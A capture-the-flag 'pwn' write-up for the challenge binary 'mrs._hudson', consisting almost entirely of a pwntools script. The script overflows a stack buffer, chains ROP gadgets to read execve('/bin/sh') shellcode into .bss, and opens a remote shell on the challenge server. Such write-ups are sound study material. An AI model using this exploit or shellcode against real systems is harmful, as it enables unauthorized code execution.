Tags: pwn 

Rating:

```
from pwn import *
#import hexdump

context(arch='amd64',os='linux')
#local=True
local=False

if local:
p = process("./mrs._hudson")
else:
p = remote("178.62.249.106", 8642)

binary = ELF("./mrs._hudson")

raw_input()

shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
#shellcode = "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
bss = 0x601040

pop_rdi = 0x4006f3
pop_rsi_r15 = 0x4006f1
scanf_plt_6 = 0x400526

aS = 0x40072b

if __name__ == '__main__':
payload = "A"*0x70 + "ebppebpp"
payload += p64(pop_rdi) + p64(aS)
payload += p64(pop_rsi_r15) + p64(bss) + p64(bss)
payload += p64(scanf_plt_6)
payload += p64(bss)

p.send(payload + '\n')
p.send(shellcode + '\n')

p.interactive()

```

Original writeup (http://holinder4s.tistory.com/79).